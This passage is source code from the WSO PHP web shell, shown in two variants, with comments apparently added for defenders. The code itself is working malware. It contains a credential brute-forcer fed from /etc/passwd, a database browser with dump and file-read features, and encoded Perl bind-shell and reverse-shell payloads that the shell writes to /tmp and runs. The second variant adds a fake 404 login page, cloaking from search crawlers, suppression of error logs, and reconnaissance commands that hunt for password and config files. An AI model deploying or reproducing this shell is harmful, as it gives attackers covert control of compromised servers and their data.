                if(!$fp) return false;
                $res = @ftp_login($fp, $login, $pass);
                @ftp_close($fp);
                return $res;
            }
        } elseif( $_POST['proto'] == 'mysql' ) {
            // Not functional as written (see notes above).
            function bruteForce($ip,$port,$login,$pass) {
                $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
                @mysql_close($res);
                return $res;
            }
        } elseif( $_POST['proto'] == 'pgsql' ) {
            // Not functional as written (see notes above).
            function bruteForce($ip,$port,$login,$pass) {
                $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
                $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
                @pg_close($res);
                return $res;
            }
        }
        $success = 0;
        $attempts = 0;
        $server = explode(":", $_POST['server']);
        // Type 1: usernames from the local passwd file, password = username (and reversed).
        if($_POST['type'] == 1) {
            $temp = @file('/etc/passwd');
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = explode(":", $line);
                    ++$attempts;
                    if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
                    }
                    if(@$_POST['reverse']) {
                        $tmp = "";
                        for($i=strlen($line[0])-1; $i>=0; --$i)
                            $tmp .= $line[0][$i];
                        ++$attempts;
                        if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
                            $success++;
                            echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
                        }
                    }
                }
        // Type 2: fixed login, one password per line of the dictionary file.
        } elseif($_POST['type'] == 2) {
            $temp = @file($_POST['dict']);
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = trim($line);
                    ++$attempts;
                    if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
                    }
                }
        }
        echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
    }
    // Input form; hidden fields carry the shell's action/cwd/charset state through the POST.
    echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
        .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
        .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
        .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
        .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
        .'<span>Server:port</span></td>'
        .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
        .'<tr><td><span>Brute type</span></td>'
        .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
        .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
        .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
        .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
        .'<td><input type=text name=login value="komsen"></td></tr>'
        .'<tr><td><span>Dictionary</span></td>'
        .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
        .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
    echo '</div><br>';
    printFooter();
}
1072 
1073 function actionSql() { 
    /*
     * Thin wrapper over the legacy mysql_* and pg_* extensions used by the
     * "Sql browser" page. Declared inside actionSql(), so the class only
     * exists while that action runs. $type is 'mysql' or 'pgsql' (taken from
     * the posted 'type' field by the caller); $link is the connection
     * resource and $res the last result.
     *
     * Defender notes:
     *  - The constructor is PHP4-style (method named after the class). On PHP 8
     *    that is an ordinary method, so $type is never set and every switch
     *    below falls through to "return false".
     *  - mysql_* was removed in PHP 7, so on current hosts only the pgsql
     *    branches can work at all.
     *  - setCharset() has two 'mysql' case labels; the pg_set_client_encoding()
     *    branch is unreachable.
     *  - dump() writes CREATE TABLE / INSERT statements to the output buffer;
     *    the caller ships that buffer as a gzip-encoded "dump.sql" attachment.
     *    Table names come from the request and are interpolated into the SQL
     *    unescaped.
     */
    class DbClass {
        var $type;
        var $link;
        var $res;
        // PHP4-style constructor (see notes above).
        function DbClass($type)    {
            $this->type = $type;
        }
        // Opens the connection; pgsql accepts "host:port" and defaults the port to 5432.
        // Returns true on success, false otherwise. $dbname is unused for mysql.
        function connect($host, $user, $pass, $dbname){
            switch($this->type)    {
                case 'mysql':
                    if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
                    break;
                case 'pgsql':
                    $host = explode(':', $host);
                    if(!$host[1]) $host[1]=5432;
                    if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
                    break;
            }
            return false;
        }
        // mysql only; pgsql selects its database at connect time.
        function selectdb($db) {
            switch($this->type)    {
                case 'mysql':
                    if (@mysql_select_db($db))return true;
                    break;
            }
            return false;
        }
        // Runs a raw statement and stores/returns the result resource (false on failure).
        function query($str) {
            switch($this->type) {
                case 'mysql':
                    return $this->res = @mysql_query($str);
                    break;
                case 'pgsql':
                    return $this->res = @pg_query($this->link,$str);
                    break;
            }
            return false;
        }
        // Fetches the next row as an associative array from the given result,
        // or from the last stored result when called without arguments.
        function fetch() {
            $res = func_num_args()?func_get_arg(0):$this->res;
            switch($this->type)    {
                case 'mysql':
                    return @mysql_fetch_assoc($res);
                    break;
                case 'pgsql':
                    return @pg_fetch_assoc($res);
                    break;
            }
            return false;
        }
        // Result set of database names.
        function listDbs() {
            switch($this->type)    {
                case 'mysql':
                    return $this->res = @mysql_list_dbs($this->link);
                break;
                case 'pgsql':
                    return $this->res = $this->query("SELECT datname FROM pg_database");
                break;
            }
            return false;
        }
        // Result set of table names in the current database (pgsql also includes pg_user).
        function listTables() {
            switch($this->type)    {
                case 'mysql':
                    return $this->res = $this->query('SHOW TABLES');
                break;
                case 'pgsql':
                    return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
                break;
            }
            return false;
        }
        // Last driver error message, or false for an unknown type.
        function error() {
            switch($this->type)    {
                case 'mysql':
                    return @mysql_error($this->link);
                break;
                case 'pgsql':
                    return @pg_last_error($this->link);
                break;
            }
            return false;
        }
        // Sets the connection charset. The second case label is 'mysql' too, so the
        // pg_set_client_encoding() branch never runs.
        function setCharset($str) {
            switch($this->type)    {
                case 'mysql':
                    if(function_exists('mysql_set_charset'))
                        return @mysql_set_charset($str, $this->link);
                    else
                        $this->query('SET CHARSET '.$str);
                    break;
                case 'mysql':
                    return @pg_set_client_encoding($this->link, $str);
                    break;
            }
            return false;
        }
        // Echoes SQL that recreates $table: CREATE TABLE (mysql only) followed by
        // one INSERT per row. Values are quoted with mysql_real_escape_string()
        // or addslashes(); the table name itself is not escaped. Always returns false.
        function dump($table) {
            switch($this->type)    {
                case 'mysql':
                    $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
                    $create = mysql_fetch_array($res);
                    echo $create[1].";\n\n";
                    $this->query('SELECT * FROM `'.$table.'`');
                    while($item = $this->fetch()) {
                        $columns = array();
                        foreach($item as $k=>$v) {
                            $item[$k] = "'".@mysql_real_escape_string($v)."'";
                            $columns[] = "`".$k."`";
                        }
                    echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
                    }
                break;
                case 'pgsql':
                    $this->query('SELECT * FROM '.$table);
                    while($item = $this->fetch()) {
                        $columns = array();
                        foreach($item as $k=>$v) {
                            $item[$k] = "'".addslashes($v)."'";
                            $columns[] = $k;
                        }
                    echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
                    }
                break;
            }
            return false;
        }
    };
1203     $db = new DbClass($_POST['type']); 
1204     if(@$_POST['p2']=='download') { 
1205         ob_start("ob_gzhandler", 4096); 
1206         $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); 
1207         $db->selectdb($_POST['sql_base']); 
1208         header("Content-Disposition: attachment; filename=dump.sql"); 
1209         header("Content-Type: text/plain"); 
1210         foreach($_POST['tbl'] as $v) 
1211                 $db->dump($v); 
1212         exit; 
1213     } 
1214     printHeader(); 
1215     ?> 
1216     <h1>Sql browser</h1><div class=content> 
1217     <form name="sf" method="post"> 
1218         <table cellpadding="2" cellspacing="0"> 
1219             <tr> 
1220                 <td>Type</td> 
1221                 <td>Host</td> 
1222                 <td>Login</td> 
1223                 <td>Password</td> 
1224                 <td>Database</td> 
1225                 <td></td> 
1226             </tr> 
1227             <tr> 
1228                 <input type=hidden name=a value=Sql> 
1229                 <input type=hidden name=p1 value='query'> 
1230                 <input type=hidden name=p2> 
1231                 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'> 
1232                 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
1233                 <td> 
1234                     <select name='type'> 
1235                         <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option> 
1236                         <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option> 
1237                     </select></td> 
1238                 <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td> 
1239                 <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td> 
1240                 <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td> 
1241                 <td> 
1242     <?php 
1243     $tmp = "<input type=text name=sql_base value=''>"; 
1244     if(isset($_POST['sql_host'])){ 
1245         if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { 
1246             switch($_POST['charset']) { 
1247                 case "Windows-1251": $db->setCharset('cp1251'); break; 
1248                 case "UTF-8": $db->setCharset('utf8'); break; 
1249                 case "KOI8-R": $db->setCharset('koi8r'); break; 
1250                 case "KOI8-U": $db->setCharset('koi8u'); break; 
1251                 case "cp866": $db->setCharset('cp866'); break; 
1252             } 
1253             $db->listDbs(); 
1254             echo "<select name=sql_base><option value=''></option>"; 
1255             while($item = $db->fetch()) { 
1256                 list($key, $value) = each($item); 
1257                 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; 
1258             } 
1259             echo '</select>'; 
1260         } 
1261         else echo $tmp; 
1262     }else 
1263         echo $tmp; 
1264     ?></td> 
1265                 <td><input type=submit value=">>"></td> 
1266             </tr> 
1267         </table> 
1268         <script> 
1269             function st(t,l) { 
1270                 document.sf.p1.value = 'select'; 
1271                 document.sf.p2.value = t; 
1272                 if(l!=null)document.sf.p3.value = l; 
1273                 document.sf.submit(); 
1274             } 
1275             function is() { 
1276                 for(i=0;i<document.sf.elements['tbl[]'].length;++i) 
1277                     document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked; 
1278             } 
1279         </script> 
1280     <?php 
1281     if(isset($db) && $db->link){ 
1282         echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; 
1283             if(!empty($_POST['sql_base'])){ 
1284                 $db->selectdb($_POST['sql_base']); 
1285                 echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>"; 
1286                 $tbls_res = $db->listTables(); 
1287                 while($item = $db->fetch($tbls_res)) { 
1288                     list($key, $value) = each($item); 
1289                     $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); 
1290                     $value = htmlspecialchars($value); 
1291                     echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
1292                 } 
1293                 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>"; 
1294                 if(@$_POST['p1'] == 'select') { 
1295                     $_POST['p1'] = 'query'; 
1296                     $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].''); 
1297                     $num = $db->fetch(); 
1298                     $num = $num['n']; 
1299                     echo "<span>".$_POST['p2']."</span> ($num) "; 
1300                     for($i=0;$i<($num/30);$i++) 
1301                         if($i != (int)$_POST['p3']) 
1302                             echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> "; 
1303                         else 
1304                             echo ($i+1)," "; 
1305                     if($_POST['type']=='pgsql') 
1306                         $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); 
1307                     else 
1308                         $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; 
1309                     echo "<br><br>"; 
1310                 } 
1311                 if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) { 
1312                     $db->query(@$_POST['p3']); 
1313                     if($db->res !== false) { 
1314                         $title = false; 
1315                         echo '<table width=100% cellspacing=0 cellpadding=2 class=main>'; 
1316                         $line = 1; 
1317                         while($item = $db->fetch())    { 
1318                             if(!$title)    { 
1319                                 echo '<tr>'; 
1320                                 foreach($item as $key => $value) 
1321                                     echo '<th>'.$key.'</th>'; 
1322                                 reset($item); 
1323                                 $title=true; 
1324                                 echo '</tr><tr>'; 
1325                                 $line = 2; 
1326                             } 
1327                             echo '<tr class="l'.$line.'">'; 
1328                             $line = $line==1?2:1; 
1329                             foreach($item as $key => $value) { 
1330                                 if($value == null) 
1331                                     echo '<td><i>null</i></td>'; 
1332                                 else 
1333                                     echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; 
1334                             } 
1335                             echo '</tr>'; 
1336                         } 
1337                         echo '</table>'; 
1338                     } else { 
1339                         echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; 
1340                     } 
1341                 } 
1342                 echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>"; 
1343                 echo "</td></tr>"; 
1344             } 
1345             echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; 
1346             if(@$_POST['p1'] == 'loadfile') { 
1347                 $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file"); 
1348                 $file = $db->fetch(); 
1349                 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1350             } 
1351     } 
1352     echo '</div>'; 
1353     printFooter(); 
1354 } 
/**
 * "Network tools" action: bind-shell / back-connect launcher.
 *
 * Renders two forms (both named 'nfp') that submit through g() with
 * p1 = the selected implementation: 'bpc'/'bpp' bind a port (C/Perl),
 * 'bcc'/'bcp' connect back to a server (C/Perl). For the bind forms p2 is
 * the port and p3 the password (defaults 31337 / 'wso'); for the
 * back-connect forms p2 is the server (prefilled with the requester's
 * REMOTE_ADDR) and p3 the port. The payload sources are embedded below as
 * base64 strings; the two C variants are redacted on this page.
 *
 * On POST the chosen source is decoded to a fixed path under /tmp, C
 * variants are compiled with gcc and the .c file removed, the binary or
 * script is started in the background through ex(), and a
 * `ps aux | grep` listing is echoed back. Host artifacts for incident
 * response: /tmp/bp.c, /tmp/bp, /tmp/bp.pl, /tmp/bc.c, /tmp/bc,
 * /tmp/bc.pl, a gcc/perl child of the web-server user, and the resulting
 * listening or outbound socket. ex() and which() are defined elsewhere
 * in the file (which() is not visible in this listing).
 */
function actionNetwork() {
    printHeader();
    $back_connect_c="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";
    $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
    $bind_port_c="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";
    $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
    ?>
    <h1>Network tools</h1><div class=content>
    <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
    <span>Bind port to /bin/sh</span><br/>
    Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
    </form>
    <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
    <span>Back-connect to</span><br/>
    Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
    </form><br>
    <?php
    // Only runs when one of the forms above was submitted (p1 set).
    if(isset($_POST['p1'])) {
        // Writes base64-decoded $t to path $f. Because `=` binds tighter
        // than `or`, $w only ever holds the fopen() result; when fopen()
        // fails, $w is false, the if() is skipped and nothing is written.
        // Every call is @-suppressed, so a failure leaves no log entry.
        function cf($f,$t) {
            $w=@fopen($f,"w") or @function_exists('file_put_contents');
            if($w)    {
                @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
                @fclose($w);
            }
        }
        // bind port, C: p2 = port, p3 = password
        if($_POST['p1'] == 'bpc') {
            cf("/tmp/bp.c",$bind_port_c);
            $out = ex("gcc -o /tmp/bp /tmp/bp.c");
            @unlink("/tmp/bp.c");
            $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
        }
        // bind port, Perl: p2 = port (the password field is not used here)
        if($_POST['p1'] == 'bpp') {
            cf("/tmp/bp.pl",$bind_port_p);
            $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
        }
        // back-connect, C: p2 = server, p3 = port
        if($_POST['p1'] == 'bcc') {
            cf("/tmp/bc.c",$back_connect_c);
            $out = ex("gcc -o /tmp/bc /tmp/bc.c");
            @unlink("/tmp/bc.c");
            $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
        }
        // back-connect, Perl: p2 = server, p3 = port
        if($_POST['p1'] == 'bcp') {
            cf("/tmp/bc.pl",$back_connect_p);
            $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
        }
    }
    echo '</div>';
    printFooter();
}
// Request router. The POST field `a` names the action; when it is empty,
// $default_action is used if a matching action* function exists, else
// 'SecInfo'. Any value for which a function named `action<a>` exists is
// then invoked through call_user_func(). Every operation of this shell is
// therefore a POST carrying `a` (plus c/p1/p2/p3/charset from the hidden
// form), which makes request logs that retain POST bodies the primary
// evidence source when reconstructing what was done.
if( empty($_POST['a']) )
    if(isset($default_action) && function_exists('action' . $default_action))
        $_POST['a'] = $default_action;
    else
        $_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
    call_user_func('action' . $_POST['a']);
1415 ?> 
1416 <a href="http://www.devilscafe.in" target="_blank"><img src="http://images.cooltext.com/1380134.gif" /></a><div id="cot_tl_fixed"><marquee>Private Shell - (c)oded by Lagipre-dz ~ (e)dited by Minhal Mehdi</marquee></div> 
1417 www.devilscafe.in </marquee></div>

Here is another version of the same shell script, WSO 2.1, this time attributed to pgems.in:

   1 <?php 
   2 /* WSO 2.1 (Web Shell by pgems.in) */ 
   3 /*Subhashdasyam.com*/
// Access control and anti-analysis setup.
// $auth_pass is the MD5 of the access password; further down it is compared
// (loosely, with ==) against md5($_POST['pass']), and an empty value disables
// authentication entirely.
$auth_pass = "36028fcd4abb97e9e4f47d929ddc9980";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
// Crawler cloaking: any User-Agent containing "Google" receives a bare 404,
// so the shell does not show up in search-engine indexes.
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
// Anti-forensics: silence PHP errors, detach from the error log, and lift
// the execution time limit so long-running actions are not cut off.
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
// Undo magic_quotes_gpc escaping on POST data (a legacy feature removed in
// PHP 5.4; get_magic_quotes_gpc() itself no longer exists in PHP 8).
if( get_magic_quotes_gpc() ) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
}
/**
 * Login gate disguised as an Apache "404 Not Found" page.
 *
 * The markup mimics a stock Apache error page (echoing the request's Host
 * header) and appends a password form whose input is styled white on
 * white so it is effectively invisible in a browser. Always exit()s, so
 * the caller never continues past it. A "404" page body that contains a
 * <form> with a password input is a usable content signature for this
 * family.
 */
function printLogin() {
    ?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
    <style>
        input { margin:0;background-color:#fff;border:1px solid #fff; }
    </style>
    <center>
    <form method=post>
    <input type=password name=pass>
    </form></center>
    <?php
    // Unconditional: the request ends here.
    exit;
}
// Session-based authentication. The session flag is keyed by md5(HTTP_HOST).
// Access is granted when $auth_pass is empty or when the posted password's
// MD5 loosely (==) equals $auth_pass; otherwise the fake 404 login page is
// shown and the request ends inside printLogin().
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( $auth_pass ) ||
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        printLogin();

// Platform detection and environment snapshot used by the actions below.
if( strtolower( substr(PHP_OS,0,3) ) == "win" )
    $os = 'win';
else
    $os = 'nix';
$safe_mode = @ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
// The hidden form's `c` field changes the working directory for the whole
// request; the value is used as-is.
if( isset( $_POST['c'] ) )
    @chdir($_POST['c']);
$cwd = @getcwd();
if( $os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != '/' )
    $cwd .= '/';

// Preset command aliases offered by the console action (label => shell
// command). The Unix list is reconnaissance oriented: SUID/SGID and
// world-writable files, configuration and credential files, shell
// histories; the entries with an empty command ('Find', 'Locate') presumably
// act as group headers. Seeing these exact command lines executed by the
// web-server user in auditd or process-accounting data is a strong
// indicator of this tool in use.
if($os == 'win')
    $aliases = array(
        "List Directory" => "dir",
        "Find index.php in current dir" => "dir /s /w /b index.php",
        "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
        "Show active connections" => "netstat -an",
        "Show running services" => "net start",
        "User accounts" => "net user",
        "Show computers" => "net view",
        "ARP Table" => "arp -a",
        "IP Configuration" => "ipconfig /all"
    );
else
    $aliases = array(
          "List dir" => "ls -la",
        "list file attributes on a Linux second extended file system" => "lsattr -va",
          "show opened ports" => "netstat -an | grep -i listen",
        "Find" => "",
          "find all suid files" => "find / -type f -perm -04000 -ls",
          "find suid files in current dir" => "find . -type f -perm -04000 -ls",
          "find all sgid files" => "find / -type f -perm -02000 -ls",
          "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
          "find config.inc.php files" => "find / -type f -name config.inc.php",
          "find config* files" => "find / -type f -name \"config*\"",
          "find config* files in current dir" => "find . -type f -name \"config*\"",
          "find all writable folders and files" => "find / -perm -2 -ls",
          "find all writable folders and files in current dir" => "find . -perm -2 -ls",
          "find all service.pwd files" => "find / -type f -name service.pwd",
          "find service.pwd files in current dir" => "find . -type f -name service.pwd",
          "find all .htpasswd files" => "find / -type f -name .htpasswd",
          "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
          "find all .bash_history files" => "find / -type f -name .bash_history",
          "find .bash_history files in current dir" => "find . -type f -name .bash_history",
          "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
          "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
        "Locate" => "",
          "locate httpd.conf files" => "locate httpd.conf",
        "locate vhosts.conf files" => "locate vhosts.conf",
        "locate proftpd.conf files" => "locate proftpd.conf",
        "locate psybnc.conf files" => "locate psybnc.conf",
        "locate my.conf files" => "locate my.conf",
        "locate admin.php files" =>"locate admin.php",
        "locate cfg.php files" => "locate cfg.php",
        "locate conf.php files" => "locate conf.php",
        "locate config.dat files" => "locate config.dat",
        "locate config.php files" => "locate config.php",
        "locate config.inc files" => "locate config.inc",
        "locate config.inc.php" => "locate config.inc.php",
        "locate config.default.php files" => "locate config.default.php",
        "locate config* files " => "locate config",
        "locate .conf files"=>"locate '.conf'",
        "locate .pwd files" => "locate '.pwd'",
        "locate .sql files" => "locate '.sql'",
        "locate .htpasswd files" => "locate '.htpasswd'",
        "locate .bash_history files" => "locate '.bash_history'",
        "locate .mysql_history files" => "locate '.mysql_history'",
        "locate .fetchmailrc files" => "locate '.fetchmailrc'",
        "locate backup files" => "locate backup",
        "locate dump files" => "locate dump",
        "locate priv files" => "locate priv"
    );
 127 
/**
 * Emits the common page head: CSS, the hidden POST form `mf` and its JS
 * helpers, then an information banner and the action menu.
 *
 * Banner contents: uname (with Google/milw0rm lookup links), effective
 * uid/user and gid/group, PHP version, safe_mode state, disk total/free,
 * a clickable breadcrumb of the working directory and, on Windows, the
 * available drive letters; a charset selector, the "Server IP" (resolved
 * from the request's Host header) and the client IP. The <title> embeds
 * "404 Not Found Shell V.<version>", a handy string for content-based
 * detection of rendered pages.
 */
function printHeader() {
    if(empty($_POST['charset']))
        $_POST['charset'] = "UTF-8";
    global $color;
    // Markup below: CSS; JS helpers set()/g() fill and submit the hidden
    // form `mf` (fields a, c, p1, p2, p3, charset); a() POSTs the same
    // fields via XMLHttpRequest with ajax=true, and processReqChange()
    // eval()s the length-prefixed JavaScript contained in the reply.
    ?>
<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found Shell V.<?=VERSION?>-SubhashDasyam.com</title>
<style>
    body {background-color:#000;color:#fff;}
    body,td,th    { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
    span,h1,a    { color:<?=$color?> !important; }
    span        { font-weight: bolder; }
    h1            { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
    div.content    { padding: 5px;margin-left:5px;}
    a            { text-decoration:none; }
    a:hover        { background:#ff0000; }
    .ml1        { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
    .bigarea    { width:100%;height:250px; }
    input, textarea, select    { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; }
    form        { margin:0px; }
    #toolsTbl    { text-align:center; }
    .toolsInp    { width: 80%; }
